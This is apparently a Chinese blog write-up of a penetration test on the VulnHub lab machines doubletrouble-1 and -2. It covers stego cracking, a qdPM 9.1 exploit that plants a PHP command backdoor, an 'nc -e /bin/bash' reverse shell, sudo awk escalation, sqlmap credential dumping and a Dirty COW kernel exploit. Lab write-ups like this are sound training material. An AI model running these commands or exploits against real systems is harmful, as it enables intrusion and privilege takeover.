vulnhub靶机-doubletrouble: 1

已于 2022-12-19 14:03:24 修改
阅读量700 收藏
点赞数 3
分类专栏: 打靶 文章标签: linux 网络安全
于 2022-08-25 22:08:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/yc11223344/article/details/126531642
版权

环境信息

攻击机:192.168.100.128
靶机:192.168.100.130

doubletrouble-1靶机渗透

一、主机发现

arp-scan -l

在这里插入图片描述
发现靶机ip

二、端口扫描

在这里插入图片描述
发现开放80,22端口
访问80端口
在这里插入图片描述
进行弱口令,注入都没有得到结果,发现qdPM,版本9.1,先拿小本本记住这个发现

三、目录遍历

在这里插入图片描述
每个都打开看一下,发现在secret目录下有一个jpg图片
在这里插入图片描述
在这里插入图片描述

四、渗透测试

使用steghide工具先查看一下图片基本信息

apt-get install steghide

发现一张可以图片,看一下是否有隐写
在这里插入图片描述
发现需要密码,但是现在没有可以用的密码
使用stegseek进行爆破

https://github.com/RickdeJager/stegseek/releases #stegseek下载地址,下载stegseek_0.6-1.deb
apt install stegseek_0.6-1.deb路径 #安装stegseek

解压kali字典,使用kali自带字典进行爆破

gunzip /usr/share/wordlists/rockyou.txt.gz #kali自带字典,需要先解压
mkdir dict #创建一个文件夹用来存放rockyou.txt字典
cp /usr/share/wordlists/rockyou.txt /root/dict/ #将解压的字典复制到dict文件夹里

在这里插入图片描述
打开doubletrouble.jpg.out
在这里插入图片描述
看到账号密码,尝试登录
在这里插入图片描述
发现这里有上传点
在这里插入图片描述
在这里插入图片描述
方法一:上传冰蝎马,进行连接

方法二:kali中自带有漏洞库,通过漏洞库的查找可以找到与qdPM9.1有关的漏洞进行POC测试
searchsploit -u 更新漏洞库

在这里插入图片描述
可以看到有很多poc可以利用

searchsploit -m 50175.py

进行下载
在这里插入图片描述
打开50175.py发现有一些错误,大部分都是换行的问题,进行修改即可
进行后门的生成

python3 50175.py -url http://192.168.100.130/ -u otisrush@localhost.com -p otis666

在这里插入图片描述
访问后门地址
在这里插入图片描述
点击生成的php文件在url后面加?cmd=想要执行的命令
在这里插入图片描述
用nc进行监听,进行反弹shell
在这里插入图片描述
在浏览器输入 nc -e /bin/bash ip 1234
在这里插入图片描述
连接成功
执行python3 -c 'import pty;pty.spawn("/bin/bash")'进行反弹会话
在这里插入图片描述

五、提权

使用sudo -l查看该用户是否具有sudo权限
在这里插入图片描述
发现awk可以进行无密码使用sudo操作
在这里插入图片描述
进行提权
sudo awk ‘BEGIN {system(“/bin/bash”)}’
在这里插入图片描述
成功拿到管理员权限
进到root目录下发现还有一个靶机
在这里插入图片描述
我们把靶机复制到uploads目录下

cp doubletrouble.ova /var/www/html/uploads

在这里插入图片描述
进行下载

doubletrouble-2靶机渗透

一、主机发现

在这里插入图片描述

二、端口扫描

在这里插入图片描述
还是开放80,22端口

三、渗透测试

访问80端口
在这里插入图片描述
进行测试发现有时间型盲注

sqlmap -r sqlmap.txt --batch

在这里插入图片描述
进行爆库

sqlmap -r sqlmap.txt --batch --dbs

在这里插入图片描述
爆表

sqlmap -r sqlmap.txt --batch -D doubletrouble --tables

在这里插入图片描述
爆列

sqlmap -r sqlmap.txt --batch -D doubletrouble -T users --colums
在这里插入图片描述

爆字段

sqlmap -r sqlmap.txt --batch -D doubletrouble -T users -C username,password --dump

在这里插入图片描述
这时候想到开放22端口,进行ssh连接
montreux不可以进行连接
在这里插入图片描述
clapton可以连接
在这里插入图片描述

四、提权

使用sudo -l查看权限
发现该用户不具有sudo权限
在这里插入图片描述
查看系统内核
在这里插入图片描述
发现系统内核版本是linux3.2,有脏牛提权漏洞

searchsploit linux 3.2

40616.c是关于脏牛提权的,进行下载

searchsploit -m 40616.c

在这里插入图片描述
查看一下如何使用
先使用gcc连接,然后直接使用,后面不用跟其他命令
在这里插入图片描述
使用nc传输,将40616.c传输到clapton系统中
在clapton的shell中启动nc接收

nc -lvnp 10086 > 40616.c

在这里插入图片描述
在kali中使用nc上传40616.c

nc 192.168.100.131 10086 < 40616.c -w 1

在这里插入图片描述

传输完成
在这里插入图片描述
发现user.txt,打开查看
在这里插入图片描述
进行解密
在这里插入图片描述
继续提权
40616.c没有执行权限,进行赋予权限

chmod 777 40616.c

在这里插入图片描述
在使用gcc生成一个执行程序
在这里插入图片描述
执行可执行文件
在这里插入图片描述

进入root目录,发现flag
在这里插入图片描述

大功告成

hang0c
关注
  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
VulnHub doubletrouble
weixin_45682839的博客
10-11 356
涉及知识:端口服务探测、敏感目录收集、WEB信息搜集、框架漏洞利用、利用代码修改、图片隐写破解、linux本地提权、SQL注入等。
Vulnhub靶机doubletrouble
qq_48904485的博客
01-06 1018
运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机doubletrouble(10.0.2.7)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/doubletrouble-1,743/
vulnhub靶场-DoubleTrouble
qq_42947816的博客
07-12 1179
Vulnhub旨在提供环境,让任何人都能在数字安全、计算机软件和网络管理方面获得实际的“实践”经验。
如何使用Stegseek解密并提取隐写工具Steghide隐藏的内容
最新发布
FreeBuf_的博客
05-20 1001
该工具一开始作为Steghide项目的分支进行开发,因此该工具的运行速度非常快,要比其他破解工具快好几千倍,并且能够在不到两秒的时间里运行完整个rockyou.txt(rockyou.txt是一个包含了1400万个密码的著名字典)。Stegseek是一款针对Steghide的隐藏数据提取工具,该工具可以对经过Steghide工具处理过的内容进行分析,并从目标文件中提取出隐藏数据。-sf, --stegofile 选择一个stego文件。
vulnhub刷题记录(doubletrouble: 1)
ailx10
08-21 198
英文名称:doubletrouble: 1中文名称:双重烦恼:1发布日期:2021 年 9 月 11 日难度:容易描述:关于 vm:测试并从 virtualbox 导出。启用 dhcp 和嵌套 vtx/amdv。您可以通过电子邮件与我联系以获取故障排除或问题。下载地址:https://www.vulnhub.com/entry/empire-breakout,751/ 1、主机发现(192.168...
vulnhubdoubletrouble: 1
weixin_54431413的博客
06-05 916
开源项目信息收集 框架漏洞突破边界 利用sudo配置不当进行提权 tabby工具远程连接linux,sftp传输文件 sql之时间盲注拿到密码打点成功 脏牛漏洞提权成功,复原/etc/passwd 改掉root密码
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 Five-1靶机
12-07
Vulnhub靶机渗透测试 Five-1靶机
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
stegseek:世界上最快的Steghide饼干,每秒可读取数百万个密码
03-31
:high_voltage: Stegseek Stegseek是一种快如闪电的Steghide饼干,可用于从文件中提取隐藏数据。 它是作为原始steghide项目的一个分支而构建的,因此,它比其他饼干要快数千倍,并且可以在2秒钟内遍历整个rockyou.txt *。 Stegseek还可以用于在没有密码的情况下提取steghide元数据,该密码可以用于测试文件是否包含steghide数据。 * rockyou.txt是一个著名的密码列表,其中包含超过1400万个密码。 演示:随机的rockyou.txt密码(实时) 跳至“以获取一些原始数据。 :wrench: 安装 以下说明将引导您完成安装过程。 或者,您可以在Docker容器中运行Stegseek。 跳至以获取说明。 发行版 Linux 在Ubuntu和其他基于Debian的系统上,可以使用提供的.deb软件包进行安装: 下载最新的 使用sudo apt in
隐写工具steghide
04-16
steghie图片隐写 用法: steghide extract -sf picture.jpg 然后输入密码,没有密码则回车跳过
Steghide UI-开源
05-13
Steghide UI是Drunken.Canadian为控制台应用程序steghide编写的一个漂亮的GUI,顾名思义。 它允许用户使用Steghide所能提供的一切,但具有友好的用户友好GUI。 现在,steghide UI具有一个新的选项面板。
Vulnhub——DOUBLETROUBLE: 1
weixin_46038704的博客
06-03 529
Vulnhub——DOUBLETROUBLE: 1
Vulnhub靶场】DOUBLETROUBLE: 1
DG_s1mple
03-14 508
环境准备 把下载好的文件导入到vmware里面 题目里没有给出ip地址,需要我们自己去探测 信息收集 kali使用命令arp-scan命令探测IP地址 靶机IP地址为:192.168.2.18 攻击机IP地址为:192.168.2.16 我们使用namp扫描一下靶机 只开放了ssh跟http 渗透开始 我们首先访问靶机的网站 是一个登录界面,没有什么信息,我们使用dirsearch扫描一下靶机的目录 都访问一下,然后发现secret目录下有一张图片 我们把它下载下载用stegseek爆破查一下是
vulnhub靶机Dr4g0n b4ll :1渗透笔记
m0_64122957的博客
05-17 951
https://note.youdao.com/s/aFd9cC57https://note.youdao.com/s/aFd9cC57
vulnhub-doubletrouble
weixin_50683638的博客
12-08 429
靶机:http://www.vulnhub.com/entry/doubletrouble-1,743/ 网络模式:nat 攻击机kali(nat) 1,扫描靶机IP 2,扫描存活端口 3,目录扫描,查看有用的信息 sudo arp-scan -l扫描同网段的靶机ip nmap -P 1-65535 -A 192.168.6.13722,80端口 访问 dirb http://192.168.6.137扫描目录看到两个比较特殊的文件secret,uploads 访问,看到一张图片,查看图片下载下来
VulnHub日记(九):Doubletrouble
Dawn_Xi的博客
09-17 1447
靶机介绍 虚拟机链接:doubletrouble: 1 ~ VulnHub 参考博客:DoubleTrouble - HackMyVM - Vulnhub - Writeup - Security 开始练习 本机ip:192.168.56.102 目的机ip:192.168.56.122 netdiscover -r 192.168.56.0/24 nmap -A 192.168.56.122 开放80和22端口,访问web页面,同时使用dirsearch枚举目录 # .
termux下载kali
07-24
很抱歉,我是一名AI语言模型,无法进行实际操作。但是,您可以在Termux中使用以下命令来下载Kali Linux: 1. 首先,打开Termux应用程序。 2. 输入以下命令以更新软件包列表: apt update 3. 然后,输入以下命令以安装必要的软件包: apt install wget proot 4. 接下来,输入以下命令以下载Kali Linux的根文件系统: wget -q https://raw.githubusercontent.com/EXALAB/AnLinux-Resources/master/Scripts/Installer/Kali/kali.sh -O kali.sh 5. 然后,输入以下命令以运行脚本: bash kali.sh 6. 最后,输入以下命令以启动Kali Linux: ./start-kali.sh 注意:下载和安装Kali Linux可能需要一些时间,具体取决于您的设备和网络速度。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值